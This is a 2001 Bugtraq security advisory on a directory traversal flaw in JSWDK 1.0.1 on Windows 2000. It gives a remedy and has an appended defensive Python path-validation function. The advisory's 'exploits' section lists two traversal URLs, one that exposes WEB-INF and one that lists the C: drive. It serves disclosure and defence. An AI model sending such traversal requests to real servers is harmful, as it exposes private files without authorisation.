Bugtraq mailing list archives
CHINANSL Security Advisory(CSA-200106)
From: lovehacker <lovehacker () 263 NET>
Date: Wed, 28 Mar 2001 06:48:07 -0000
Topic: JavaServer Web Dev Kit (JSWDK) 1.0.1 for win2000 Directory traversal Vulnerability

vulnerable:
Microsoft Win2000 + JSWDK 1.0.1
maybe other operating systems also.

discussion:
A security vulnerability has been found in Windows NT/2000 systems that have JSWDK 1.0.1 installed. The vulnerability allows remote attackers to access files outside the document root directory scope.

exploits:
http://localhost:8080/examples//WEB-INF/
lists the /WEB-INF/ directory.
http://localhost:8080/../examples//WEB-INF/../../../../../
If JSWDK is installed in c:\, the question will list all files and directories in c:\.

solution:
Update JSWDK

Copyright 2000-2001 CHINANSL. All Rights Reserved. Terms of use.
CHINANSL Security Team <lovehacker () chinansl com>
CHINANSL INFORMATION TECHNOLOGY CO.,LTD (http://www.chinansl.com)
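For defenders, the request-path check whose absence the advisory describes, written as an added Python example that is not part of the original advisory and is not JSWDK code. The function name `resolve_request` and the list of private directory names are assumptions made for illustration; the two URL paths from the advisory are among the inputs it refuses.

```python
import os
from urllib.parse import unquote

# Assumed list of servlet-container private directories that must never be served.
# Compared case-insensitively because Windows filesystems are case-insensitive.
PRIVATE_SEGMENTS = {"web-inf", "meta-inf"}


def resolve_request(doc_root, url_path):
    """Map a request path to a file under doc_root, or return None to refuse it."""
    decoded = unquote(url_path)  # decode first, so %2e%2e is seen as ".."
    # Backslash is a path separator on Windows; NUL truncates paths in native APIs.
    if "\\" in decoded or "\x00" in decoded or not decoded.startswith("/"):
        return None

    segments = []
    for seg in decoded.split("/"):
        if seg in ("", "."):      # collapses the "//" seen in the advisory's URLs
            continue
        if seg == "..":
            if not segments:      # would climb above the document root
                return None
            segments.pop()
            continue
        segments.append(seg)

    # Check private directories after normalisation. Windows ignores trailing
    # dots and spaces in names, so "WEB-INF." must match as well.
    if any(s.lower().rstrip(". ") in PRIVATE_SEGMENTS for s in segments):
        return None

    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, *segments))
    # Containment check on the resolved path (also catches symlink escapes).
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate
```
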